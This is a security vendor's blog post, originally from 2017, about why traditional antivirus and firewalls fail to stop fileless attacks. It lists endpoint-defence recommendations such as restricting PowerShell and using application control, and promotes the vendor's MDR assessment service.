This evaluation of traditional prevention tools' methods of detection, and recommendations to prevent fileless attacks, are still relevant for companies evaluating endpoint protection, or the next step in improving their security prevention posture.
Original blog posted on 13, September 2017.
Many organizations believe using traditional anti-virus helps to protect against all forms of attack on the endpoint. Unfortunately, daily updates and weekly scans are only as good as the threats the AV knows how to detect. For anti-virus vendors, their prevention methods include Heuristics (what the file does), Signatures (a copy of the file), and other indicators (reputation, DNS or registry changes made, etc.) Companies also use firewalls prevent the download, execution, and exfiltration of malware, hoping to block scripts or files with malware in them. As a quick round-up, here's what traditional AV and Next Generation Firewalls can detect and prevent, and how they do it:
What most fail to protect against are injected fileless processes. Fileless malware is not a new problem. For example, the Duku 2.0 virus was a fileless attack reported by Kaspersky Labs all the way back in 2012.
What is common is that these attacks shift from executable files into scripts that run in browsers, Windows PowerShell and command prompts such as "white-listed" programs that are not examined by anti-virus scanners. More importantly, they are a real pain to detect and remove. Companies continue seeing the same executable install on their OS and have no idea where it's coming from or why the AV can't seem to remove it.
Protecting yourself goes beyond merely updating your AV and running scans periodically. There are several challenges in dealing with fileless attacks with only traditional AV and Firewalls:
■Fileless attacks never create a file, which makes file-based detection methods completely ineffective.
■Fileless techniques were common in targeted attacks and as the first stage of malware infection from a browser - but now the entire attack can be fileless.
■Fileless attacks often pivot from memory exploits to PowerShell code (which is not inspected by most EPP solutions). These white-listed apps typically have full control to replicate and remove fileless components and move to legitimate access.
■ Patch processes aren't fast enough to keep up with browser or app patches.
■ Many EPP solutions claim to protect against memory exploits and scripts, but most are vague on the details making it hard for buyers to compare solutions.
To make an informed decision, run through scenarios with your Managed Detection and Response (MDR) vendor before investing in new endpoint software. Doing so can help you understand the role of platform-based Endpoint Detection and Response (EDR) in protecting against these issues. For most attacks, the following endpoint framework recommendations should be included in the evaluation - your IntelliGO team can help test:
1) Check the ability to detect PowerShell, CMD and white-listed application scripts and parameters against malicious attacks
2) Conduct Security Hygiene checks on applications to look for vulnerabilities, application versions as well as OS patches
3) Ensure you understand other tools such as the Microsoft Enhanced Mitigation Experience Toolkit as a baseline
4) Remove administrative tools like Microsoft PowerShell by restricting access through Windows Group Policy or Windows AppLocker
5) Use application control to prevent internet browsers and applications (like Microsoft Office) from spawning script interpreters (like PowerShell, WMIC, and Java)
6) Ensure Anti-Malware tools utilize machine learning, AI, exploit prevention and micro-virtualization to limit the ability of scripts to create new or polymorphic malware within your environment
7) Invest in MDR services that perform threat hunting to look for malicious application behavior in your environment proactively
Understanding all fileless attacks starts by understanding that processes that run scripts are just as dangerous as executable files. Their ability to inject DLL, EXE and create privileged changes (like task schedules and other Windows settings), which avoid detection by the AV, can cause as much damage.
To understand your exposure to such attacks, have us provide a Prevention Posture Assessment (PPA) of your environment using IntelliGO MDR software.
Further reading and examples: Fileless Malware attacks 140 banks
For the real geeks out there: Using Windows WMI for Fileless Backdoor